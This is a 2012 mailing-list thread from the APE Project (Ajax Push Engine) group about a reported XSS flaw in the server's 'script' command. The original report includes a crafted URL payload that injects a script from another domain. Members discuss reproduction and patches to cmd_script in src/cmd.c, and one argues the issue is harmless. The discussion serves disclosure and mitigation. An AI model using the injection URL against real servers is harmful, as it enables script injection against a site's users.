I think this XSS vulnerabilty is no more of a threat than the browser console or the browser address bar for that matter. As mentioned above the script command just sandboxes the the passed js script files into a separate DOM. In other words it just generates an HTML file with the javascript file provided.
The generated HTML file does nothing on its own and even if embeded in your page in an iFrame is limited to see and do what any user could do from the browser console or the browser address bar. In fact the JS(no mootools) framework uses this command to sandbox the mootools base framework in an iFrame as it can be seen in https://github.com/APE-Project/APE_JSF/blob/master/Build/uncompressed/apeClientJS.js#L136 This command could have been a threat if javascript would have been internally evaluated by the framework which not even code encapsulation would help. But this is not the case. The scope of my knowledge makes me conclude that there is no XSS vulnerability here, but i could be wrong. On Dec 13, 2012 5:12 AM, "tr!ckle" <[email protected]> wrote: > This function composes a html document which has only scripts and puts it > to the client. As i mentioned before it allows you to put whatever you want > into this document by preparing link. If you have BAD JSON error, just > check your link, it may be some typo in it (or in my first post but I > didn't find any). > > Workaround: > 1. check if domain is valid (cmd.c line 470) > 2. check if script is valid (cmd.c line 477) > > And that's it. > I hope this is helpful/ > > W dniu czwartek, 13 grudnia 2012 05:35:06 UTC+1 użytkownik UTAN napisał: >> >> Ok, give me a shout out if you got more info, since I am testing on my >> testbed server.. >> >> On Dec 12, 8:30 pm, Pablo Tejada <[email protected]> wrote: >> > I took a look at the cmd_script() and im no C savy but i dont think >> that >> > command does what we think it does. >> > >> > I personally thought it injected javascript directly into the server >> > enviroment but it doesn't looks like it, i have to test it and see. >> > On Dec 12, 2012 11:09 PM, "UTAN" <[email protected]> wrote: >> > >> > >> > >> > >> > >> > >> > >> > > Pablo, >> > >> > > I don't seem to duplicate it. >> > >> > > I have put your your hook as follow >> > > Ape.registerHookCmd('script', function(){ >> > > Ape.log('Script was called >> sussefully'); >> > > //return false; >> > > }); >> > >> > > and tried to run tru Ape server URL .. and doesn't log anything... >> > > But manage to find the function on that file mentioned above.. >> > >> > > On Dec 12, 4:58 pm, Pablo Tejada <[email protected]> wrote: >> > > > You would have to patch the file, rebuild the server and replace >> the >> > > > generated aped file with the one in your installation. >> > >> > > > Before digging into the source can you verify if the hook i >> mentioned >> > > above >> > > > fixes this bug? >> > > > On Dec 12, 2012 7:52 PM, "UTAN" <[email protected]> wrote: >> > >> > > > > Indeed , thanks for point it out Pablo.. >> > > > > Now what should i just edit and patch and the file and then >> reload Ape >> > > > > or I have to reinstall all over? >> > >> > > > > On Dec 12, 10:20 am, Pablo Tejada <[email protected]> wrote: >> > > > > > He did mentioned src/cmd.c >> > > > > > On Dec 12, 2012 1:15 PM, "UTAN" <[email protected]> >> wrote: >> > >> > > > > > > Have you released any patch, if you made some workaround what >> file >> > > > > > > should we patch? >> > >> > > > > > > On Dec 11, 3:56 am, tr!ckle <[email protected]> wrote: >> > > > > > > > I managed recently with an issue that allows to inject any >> js >> > > script >> > > > > by >> > > > > > > > preparing link like: >> > >> > > >> http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]}}]<http://your.ape.server.domain/?[%7B%22cmd%22:%22script%22,%22params%22:%7B%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]%7D%7D]> >> > >> > > > > > > > It allows either attach script from your url or inject >> script >> > > > > directly >> > > > > > > such >> > > > > > > > as in this example. >> > >> > > > > > > > The solution for this issue is to filter both params domain >> and >> > > > > scripts >> > > > > > > in >> > > > > > > > file src/cmd.c (function: cmd_script()) in ape server. >> > >> > > > > > > -- >> > > > > > > You received this message because you are subscribed to the >> Google >> > > > > > > Groups "APE Project" group. >> > > > > > > To post to this group, send email to >> [email protected] >> > > > > > > To unsubscribe from this group, send email to >> > > > > > > [email protected] >> > > > > > > For more options, visit this group at >> > > > > > >http://groups.google.com/group/ape-project?hl=en >> > > > > > > --- >> > > > > > > APE Project (Ajax Push Engine) >> > > > > > > Official website :http://www.ape-project.org/ >> > > > > > > Git Hub :http://github.com/APE-Project/ >> > >> > > > > -- >> > > > > You received this message because you are subscribed to the >> Google >> > > > > Groups "APE Project" group. >> > > > > To post to this group, send email to [email protected] >> > > > > To unsubscribe from this group, send email to >> > > > > [email protected] >> > > > > For more options, visit this group at >> > > > >http://groups.google.com/group/ape-project?hl=en >> > > > > --- >> > > > > APE Project (Ajax Push Engine) >> > > > > Official website :http://www.ape-project.org/ >> > > > > Git Hub :http://github.com/APE-Project/ >> > >> > > -- >> > > You received this message because you are subscribed to the Google >> > > Groups "APE Project" group. >> > > To post to this group, send email to [email protected] >> > > To unsubscribe from this group, send email to >> > > [email protected] >> > > For more options, visit this group at >> > >http://groups.google.com/group/ape-project?hl=en >> > > --- >> > > APE Project (Ajax Push Engine) >> > > Official website :http://www.ape-project.org/ >> > > Git Hub :http://github.com/APE-Project/ >> > -- > You received this message because you are subscribed to the Google > Groups "APE Project" group. > To post to this group, send email to [email protected] > To unsubscribe from this group, send email to > [email protected] > For more options, visit this group at > http://groups.google.com/group/ape-project?hl=en > --- > APE Project (Ajax Push Engine) > Official website : http://www.ape-project.org/ > Git Hub : http://github.com/APE-Project/ > -- You received this message because you are subscribed to the Google Groups "APE Project" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/ape-project?hl=en --- APE Project (Ajax Push Engine) Official website : http://www.ape-project.org/ Git Hub : http://github.com/APE-Project/
